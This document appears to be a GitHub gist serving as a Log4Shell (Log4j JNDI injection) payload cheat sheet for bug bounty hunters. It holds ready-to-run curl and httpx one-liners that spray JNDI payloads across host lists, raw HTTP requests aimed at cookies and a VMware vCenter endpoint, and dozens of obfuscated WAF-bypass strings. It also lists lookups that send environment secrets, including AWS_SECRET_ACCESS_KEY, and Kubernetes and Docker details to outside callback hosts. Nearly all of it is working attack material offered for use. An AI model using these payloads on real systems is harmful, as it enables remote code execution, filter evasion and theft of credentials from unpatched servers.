Created
December 9, 2022 13:49
-
-
Save cyberheartmi9/47f0c5ec96e47506b377936948c1bc4a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Log4Shell Some Proved Testing Methods | |
# Oneliner 1: | |
$ cat vulnerable-hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' >> L4SFuzzList | |
$ httpx -l L4SFuzzList | |
#Oneliner 2: | |
$ cat 1.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}";done (Credit:https://twitter.com/HackerGautam/status/1469751218926882816) | |
# The Great resource to learn and earn: | |
https://github.com/pentesterland/Log4Shell | |
# Screw-up the server (Run on your own risk). Gives you a lot fase-positives, but need to retest with other tools to confirm the valodation: | |
cat vulnerable-hosts.txt | httpx -H 'X-Api-Version: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Cookie: mt.v=${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Cookie: CID_CART_COOKIE=${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'User-Agent: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'User-Agent: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Referer: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Origin: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept-Language: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-By: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-For: \${jndi:ldap://${hostName}.L4J.zdgnnnz669jsqwlr243a74pk1b72v5ju.oastify.com/a}' -H 'X-Forwarded-For-Original: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Host:${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Port: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Proto: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Protocol: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Scheme: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Server: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarded-Ssl: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forwarder-For: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forward-For: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Forward-Proto: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Frame-Options: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-From: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-Geoip-Country: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'X-XSRF-TOKEN: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept-Datetime: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept-Charset: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept-Encoding: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' -H 'Accept-Language: ${jndi:ldap://x${hostName}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' | |
GET /test?id=%24%7Bj%24%7B::-n%7Ddi:dns%24%7B::-:%7D//quua8mp7vfexh3a3qkf1sggj9%24%7B::-.%7Dcanarytokens.com%7D HTTP/1.1 | |
User-Agent: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Origin: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Referer: ${j${::-n}di:dns${::-:}//quua8mp7vfexh3a3qkf1sggj9${::-.}canarytokens.com} | |
Cookie: LastMRH_Session=***; MRHSession=*** | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Encoding: gzip,deflate,br | |
Host: ****** | |
Connection: Keep-alive | |
$ curl test.domain.com -H 'Cookie: CU_BRAND=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' | |
#Cookie based Log4Shell RCE | |
GET / HTTP/2 | |
Host: test.domain.com | |
Referer: https://www.google.com/search?BC=en&q=testing | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 | |
Cookie: mt.v=***; CU_ACT=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; CID_CART_COOKIE=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; IBSD_LOCALE=en_US; CU_BRAND=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}; jsession_unique_id=xx888dd667ggddd23454d | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Encoding: gzip,deflate,br | |
#VMware vCenter Log4Shell RCE | |
POST /analytics/telemetry/ph/api/hyper/send?_c=${jndi:ldap://${sys:java.version}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a} | |
Host: test.domain.com | |
Upgrade-Insecure-Requests: 1 | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
Connection: close | |
# Some Great WAF-Bypass Payloads to Play With | |
CREDIT: https://musana.net | |
${jndi:ldap://domain.com/j} | |
${jndi:ldap:/domain.com/a} | |
${jndi:dns:/domain.com} | |
${jndi:dns://domain.com/j} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} | |
${${::-j}ndi:rmi://domain.com/j} | |
${jndi:rmi://domainldap.com/j} | |
${${lower:jndi}:${lower:rmi}://domain.com/j} | |
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} | |
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} | |
${jndi:${lower:l}${lower:d}a${lower:p}://domain.com} | |
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a} | |
${jn${env::-}di:ldap://domain.com/j} | |
${jn${date:}di${date:':'}ldap://domain.com/j} | |
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j} | |
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j} | |
${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j} | |
${j${::-nD}i${::-:}ldap://domain.com/j} | |
${j${EnV:K5:-nD}i:ldap://domain.com/j} | |
${j${loWer:Nd}i${uPper::}ldap://domain.com/j} | |
${jndi:ldap://127.0.0.1#domain.com/j} | |
${jnd${upper:ı}:ldap://domain.com/j} | |
${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j} | |
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j} | |
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://domain.com/j} | |
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j} | |
${\u006a\u006e\u0064\u0069:ldap://domain.com/j} | |
${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j} | |
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j} | |
%24%7Bjndi:ldap://domain.com/j%7D | |
%24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D | |
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} (https://twitter.com/BountyOverflow/status/1470001858873802754) | |
1. ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} | |
3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} | |
4. ${jndi:rmi://adsasd.asdasd.asdasd} - https://twitter.com/wugeej/status/1469982901412728832 | |
jndi: | |
jn${env::-}di: | |
jn${date:}di${date:':'} | |
j${k8s:k5:-ND}i${sd:k5:-:} | |
j${main:\k5:-Nd}i${spring:k5:-:} | |
j${sys:k5:-nD}${lower:i${web:k5:-:}} | |
j${::-nD}i${::-:} | |
j${EnV:K5:-nD}i: | |
j${loWer:Nd}i${uPper::} https://twitter.com/ymzkei5/status/1469765165348704256 | |
If you re filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: (https://twitter.com/Rezn0k/status/1469523006015750146) | |
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} | |
This gets past every filter I've found so far. There's no shortage of these bypasses. | |
# Different Types of Exploit Confirmation Payloads | |
# Docker Lookup | |
${jndi:ldap://${docker:containerId}.domain.com/j} | |
${jndi:ldap://${docker:containerName}.domain.com/j} | |
${jndi:ldap://${docker:imageId}.domain.com/j} | |
${jndi:ldap://${docker:imageName}.domain.com/j} | |
${jndi:ldap://${docker:shortContainerId}.domain.com/j} | |
${jndi:ldap://${docker:shortImageId}.domain.com/j} | |
# Environment Lookup | |
${jndi:ldap://${env:USER}.domain.com/j} | |
${jndi:ldap://${env:user}.domain.com/j} | |
${jndi:ldap://${env:COMPUTERNAME}.domain.com/j} | |
${jndi:ldap://${env:USERDOMAIN}.domain.com/j} | |
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.domain.com/j} | |
${jndi:ldap://${hostName}.domain.com/j} | |
${jndi:ldap://${env:JAVA_VERSION}.domain.com/j} | |
# Java Lookup | |
${jndi:ldap://${java:version}.domain.com/j} | |
${jndi:ldap://${java:runtime}.domain.com/j} | |
${jndi:ldap://${java:vm}.domain.com/j} | |
${jndi:ldap://${java:os}.domain.com/j} | |
${jndi:ldap://${java:locale}.domain.com/j} | |
${jndi:ldap://${java:hw}.domain.com/j} | |
# Kubernetes Lookup | |
${jndi:ldap://${k8s:accountName}.domain.com/j} | |
${jndi:ldap://${k8s:clusterName}.domain.com/j} | |
${jndi:ldap://${k8s:containerId}.domain.com/j} | |
${jndi:ldap://${k8s:containerName}.domain.com/j} | |
${jndi:ldap://${k8s:host}.domain.com/j} | |
${jndi:ldap://${k8s:hostIp}.domain.com/j} | |
${jndi:ldap://${k8s:labels.app}.domain.com/j} | |
${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j} | |
${jndi:ldap://${k8s:masterUrl}.domain.com/j} | |
${jndi:ldap://${k8s:namespaceId}.domain.com/j} | |
${jndi:ldap://${k8s:namespaceName}.domain.com/j} | |
${jndi:ldap://${k8s:podId}.domain.com/j} | |
${jndi:ldap://${k8s:podIp}.domain.com/j} | |
${jndi:ldap://${k8s:podName}.domain.com/j} | |
${jndi:ldap://${k8s:imageId}.domain.com/j} | |
${jndi:ldap://${k8s:imageName}.domain.com/j} | |
${jndi:ldap://.domain.com/j} | |
# Main Arguments Lookup | |
${jndi:ldap://${main:0}.domain.com/j} | |
${jndi:ldap://${main:1}.domain.com/j} | |
${jndi:ldap://${main:2}.domain.com/j} | |
${jndi:ldap://${main:3}.domain.com/j} | |
${jndi:ldap://${main:4}.domain.com/j} | |
${jndi:ldap://${main:\--file}.domain.com/j} | |
${jndi:ldap://${main:\-x}.domain.com/j} | |
${jndi:ldap://${main:bar}.domain.com/j} | |
${jndi:ldap://${main:\--quiet:-true}.domain.com/j} | |
# Web Lookup | |
${jndi:ldap://${web:attr.name}.domain.com/j} | |
${jndi:ldap://${web:contextPath}.domain.com/j} | |
${jndi:ldap://${web:contextPathName}.domain.com/j} | |
${jndi:ldap://${web:effectiveMajorVersion}.domain.com/j} | |
${jndi:ldap://${web:effectiveMinorVersion}.domain.com/j} | |
${jndi:ldap://${web:initParam.name}.domain.com/j} | |
${jndi:ldap://${web:majorVersion}.domain.com/j} | |
${jndi:ldap://${web:minorVersion}.domain.com/j} | |
${jndi:ldap://${web:rootDir}.domain.com/j} | |
${jndi:ldap://${web:serverInfo}.domain.com/j} | |
${jndi:ldap://${web:servletContextName}.domain.com/j} | |
# System Properties Lookup | |
${jndi:ldap://${sys:logPath}.domain.com/j} | |
${jndi:ldap://${sys:java.version}.domain.com/j} | |
${jndi:ldap://${sys:java.vendor}.domain.com/j} | |
# Structured Data Lookup | |
${jndi:ldap://${sys:logPath}.domain.com/j} | |
# Date Lookup | |
${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j} | |
# Context Map Lookup | |
${jndi:ldap://${ctx:loginId}.domain.com/j} | |
# Some Great Keywords to pay with: | |
Credit: https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a | |
${ctx:loginId} | |
${map:type} | |
${filename} | |
${date:MM-dd-yyyy} | |
${docker:containerId} | |
${docker:containerName} | |
${docker:imageName} | |
${env:USER} | |
${event:Marker} | |
${mdc:UserId} | |
${java:runtime} | |
${java:vm} | |
${java:os} | |
${jndi:logging/context-name} | |
${hostName} | |
${docker:containerId} | |
${k8s:accountName} | |
${k8s:clusterName} | |
${k8s:containerId} | |
${k8s:containerName} | |
${k8s:host} | |
${k8s:labels.app} | |
${k8s:labels.podTemplateHash} | |
${k8s:masterUrl} | |
${k8s:namespaceId} | |
${k8s:namespaceName} | |
${k8s:podId} | |
${k8s:podIp} | |
${k8s:podName} | |
${k8s:imageId} | |
${k8s:imageName} | |
${log4j:configLocation} | |
${log4j:configParentLocation} | |
${spring:spring.application.name} | |
${main:myString} | |
${main:0} | |
${main:1} | |
${main:2} | |
${main:3} | |
${main:4} | |
${main:bar} | |
${name} | |
${marker} | |
${marker:name} | |
${spring:profiles.active[0]} | |
${sys:logPath} | |
${web:rootDir} | |
# Some Common Headers to test | |
Accept-Charset | |
Accept-Datetime | |
Accept-Encoding | |
Accept-Language | |
Authorization | |
Authorization: Basic | |
Authorization: Bearer | |
Authorization: Oauth | |
Authorization: Token | |
Cache-Control | |
Cf-Connecting_ip | |
CF-Connecting_IP | |
Client-Ip | |
Client-IP | |
Contact | |
Cookie | |
Destination | |
DNT | |
Forwarded | |
Forwarded-For | |
Forwarded-For-Ip | |
Forwarded-Proto | |
From | |
If-Modified-Since | |
Max-Forwards | |
Origin | |
Originating-Ip | |
Pragma | |
Profile | |
Proxy | |
Proxy-Host | |
Referer | |
TE | |
True-Client-Ip | |
True-Client-IP | |
Upgrade | |
User-Agent | |
Via | |
Warning | |
X-Api-Version | |
X-Arbitrary | |
X-Att-Deviceid | |
X-ATT-DeviceId | |
X-Client-Ip | |
X-Client-IP | |
X-Correlation-ID | |
X-Csrf-Token | |
X-CSRFToken | |
X-Do-Not-Track | |
X-Foo | |
X-Foo-Bar | |
X-Forwarded | |
X-Forwarded-By | |
X-Forwarded-For | |
X-Forwarded-For-Original | |
X-Forwarded-Host | |
X-Forwarded-Port | |
X-Forwarded-Proto | |
X-Forwarded-Protocol | |
X-Forwarded-Scheme | |
X-Forwarded-Server | |
X-Forwarded-Server | |
X-Forwarded-Ssl | |
X-Forwarder-For | |
X-Forward-For | |
X-Forward-Proto | |
X-Frame-Options | |
X-From | |
X-Geoip-Country | |
X-Host | |
X-Http-Destinationurl | |
X-HTTP-DestinationURL | |
X-Http-Host-Override | |
X-Http-Method | |
X-Http-Method-Override | |
X-HTTP-Method-Override | |
X-Http-Path-Override | |
X-Https | |
X-Htx-Agent | |
X-Hub-Signature | |
X-If-Unmodified-Since | |
X-Imbo-Test-Config | |
X-Insight | |
X-Ip | |
X-Ip-Trail | |
X-Leakix | |
X-Log | |
X-Original-URL | |
X-Originating-Ip | |
X-Originating-IP | |
X-ProxyUser-Ip | |
X-Real-Ip | |
X-Real-IP | |
X-Remote-Addr | |
X-Remote-Ip | |
X-Requested-With | |
X-Request-ID | |
X-UIDH | |
X-Wap-Profile | |
X-XSRF-TOKEN | |
# Best Repo - I use this a lot | |
https://github.com/fullhunt/log4j-scan |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment